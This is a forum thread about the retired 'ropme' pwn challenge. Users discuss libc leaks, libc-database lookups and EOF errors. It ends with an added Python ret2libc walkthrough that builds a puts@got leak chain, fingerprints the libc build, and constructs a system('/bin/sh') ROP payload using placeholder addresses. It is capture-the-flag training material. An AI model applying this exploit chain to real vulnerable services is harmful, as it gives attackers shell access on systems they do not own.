ropme

@alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

Maybe 2 years ago the right libc was in this database. But now it isn't. Anyway, the challenge may be completed without the right libc :slight_smile:

@alamot said:

Try harder to leak. It’s relatively easy.
Then you can use this wonderful tool: GitHub - niklasb/libc-database: Build a database of libc offsets to simplify exploitation

You are a hero.

Hi guys) I have two questions:

  1. I followed the bitterman IppSec video approach and developed the exploit. This exploit works on the Ellingson box as well and gives a shell. But it doesn't give a shell in this challenge, not even locally on my Kali box! I get the "Got EOF while reading in interactive" error. What am I missing? PM, please:(
  2. I understand how to pwn the binary, but I can't understand how to pwn the remote web service:( Where should I place my payload? In the body of a POST request? In the URI of a GET request? Or where? Any hints really appreciated)

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.


@mkt said:

Hi. Can anyone confirm that the host still works as intended?

I am getting EOF returned by the host on a very simple leak exploit that works locally.

I don’t have a VIP subscription, so I can’t start the retired challenge, but if you want, I can take a look at what you tried (and compare it to my notes/script).

I figured out why the leak only returns EOF and the solution for it. PM me for hint if you’re stuck the same way that I was.

For those who are doing the challenge but don't want to spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don't get foolishly stuck like I did. In any case, you understand what you're doing and it's not your fault.

Here you can get it (since this is retired content I guess I can do this):

Please, be careful. Don’t install anything, just unpack it and find the file you’re looking for.

@lobo09 said:

For those who are doing the challenge but don't want to spoil themselves with writeups (like me): the library you want to use for the exploit to work is not in the database anymore. Don't get foolishly stuck like I did. In any case, you understand what you're doing and it's not your fault.

Here you can get it (since this is retired content I guess I can do this):
2.23-0ubuntu11 : libc6 : amd64 : Xenial (16.04) : Ubuntu

For anyone working on this… I first looked in https://libc.blukat.me/ to find the version and, as @lobo09 mentioned, it's not there. Then I saw mention of a GitHub libc-database. Lucky for me, they are hosting it at https://libc.rip/

It took half a dozen tries to find the right library, but it's there. The 2.23-0ubuntu11 didn't work on my instance.

John Hammond and IppSec have some great videos on YouTube using PwnTools for an exploit like this. They won’t show you this exact challenge but rather the workflow.
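The workflow the thread keeps circling back to (leak a libc address with a first ROP chain, identify the libc build from the leak, then compute system and "/bin/sh" from the matching offsets) is shown below as an added example in plain Python. It is not code from the original posts, from the challenge, or from libc-database. Every binary address (gadget, puts@plt, puts@got, main, padding) is a hypothetical placeholder that you would take from the actual target with objdump/ROPgadget, and the candidate offset table is a constructed sample in the shape libc-database/libc.rip return; verify any offset against the real libc file before relying on it.

```python
import struct

# Constructed placeholders for a hypothetical non-PIE x86-64 binary; the real
# values come from `objdump -d` / ROPgadget / gdb on the target.
POP_RDI_RET = 0x4006d3   # hypothetical 'pop rdi; ret' gadget
RET         = 0x4004a1   # hypothetical lone 'ret' (stack alignment for newer libcs)
PUTS_PLT    = 0x400500   # hypothetical puts@plt
PUTS_GOT    = 0x601018   # hypothetical puts@got.plt
MAIN        = 0x40061e   # hypothetical main(), re-entered after the leak
PADDING     = 72         # hypothetical bytes from the buffer to the saved RIP


def p64(value):
    return struct.pack("<Q", value)


def leak_chain():
    """Stage 1: puts(puts@got) prints puts's libc address, then return to main
    so the program reads a second payload instead of crashing."""
    return (b"A" * PADDING
            + p64(POP_RDI_RET) + p64(PUTS_GOT)
            + p64(PUTS_PLT)
            + p64(MAIN))


def parse_leak(raw):
    """puts stops at the first NUL byte, so a 64-bit userland address arrives as
    6 bytes followed by puts's newline. Pad to 8 bytes before unpacking; reading
    exactly 8 bytes instead is a classic way to desynchronise and hit EOF."""
    line = raw.split(b"\n", 1)[0]
    if not 1 <= len(line) <= 8:
        raise ValueError("unexpected leak length %d" % len(line))
    return struct.unpack("<Q", line.ljust(8, b"\x00"))[0]


# Constructed candidate table in the {build: {symbol: offset}} shape that
# libc-database / libc.rip produce. Offsets are illustrative; confirm them with
# `readelf -s libc.so.6 | grep puts` on the library you actually downloaded.
CANDIDATES = {
    "libc6_2.23-0ubuntu11_amd64": {"puts": 0x6f690, "system": 0x45390, "str_bin_sh": 0x18cd57},
    "libc6_2.27-3ubuntu1_amd64":  {"puts": 0x80aa0, "system": 0x4f440, "str_bin_sh": 0x1b3e9a},
    "libc6_2.31-0ubuntu9_amd64":  {"puts": 0x875a0, "system": 0x55410, "str_bin_sh": 0x1b75aa},
}


def match_libc(leaks, candidates=CANDIDATES):
    """Return the builds whose offsets agree with every leaked symbol in the low
    12 bits. ASLR only shifts by whole pages, so the page offset of each symbol
    is a stable fingerprint; leak a second symbol if several builds match."""
    hits = []
    for name, syms in candidates.items():
        if all(sym in syms and (addr & 0xfff) == (syms[sym] & 0xfff)
               for sym, addr in leaks.items()):
            hits.append(name)
    return hits


def resolve(leaked_puts, syms):
    """Rebase system and the "/bin/sh" string from the leaked puts address."""
    base = leaked_puts - syms["puts"]
    if base & 0xfff:
        raise ValueError("libc base not page aligned: wrong libc build?")
    return {"base": base,
            "system": base + syms["system"],
            "binsh": base + syms["str_bin_sh"]}


def shell_chain(addrs):
    """Stage 2: system("/bin/sh"). The extra 'ret' keeps RSP 16-byte aligned at
    the call, which newer libcs require (movaps in system/do_system)."""
    return (b"A" * PADDING
            + p64(RET)
            + p64(POP_RDI_RET) + p64(addrs["binsh"])
            + p64(addrs["system"]))


if __name__ == "__main__":
    # Constructed response a target would send after stage 1 (6 address bytes + "\n").
    sample_response = b"\x90\x46\xa6\xf7\xff\x7f\n"
    leaked = parse_leak(sample_response)
    builds = match_libc({"puts": leaked})
    print("leaked puts = %#x, matching builds: %s" % (leaked, builds))
    if len(builds) == 1:
        addrs = resolve(leaked, CANDIDATES[builds[0]])
        print("libc base %#x, system %#x, /bin/sh %#x"
              % (addrs["base"], addrs["system"], addrs["binsh"]))
        print("stage 2 length:", len(shell_chain(addrs)))
```

Against a live target the two chains would be sent with pwntools or a raw socket; the point of the stand-alone version is the parsing and matching logic, which is where the EOF and wrong-libc problems in the thread come from. If `match_libc` returns more than one build, leak a second symbol (say, `__libc_start_main` or `gets`) and pass both into the `leaks` dict before trusting any offset.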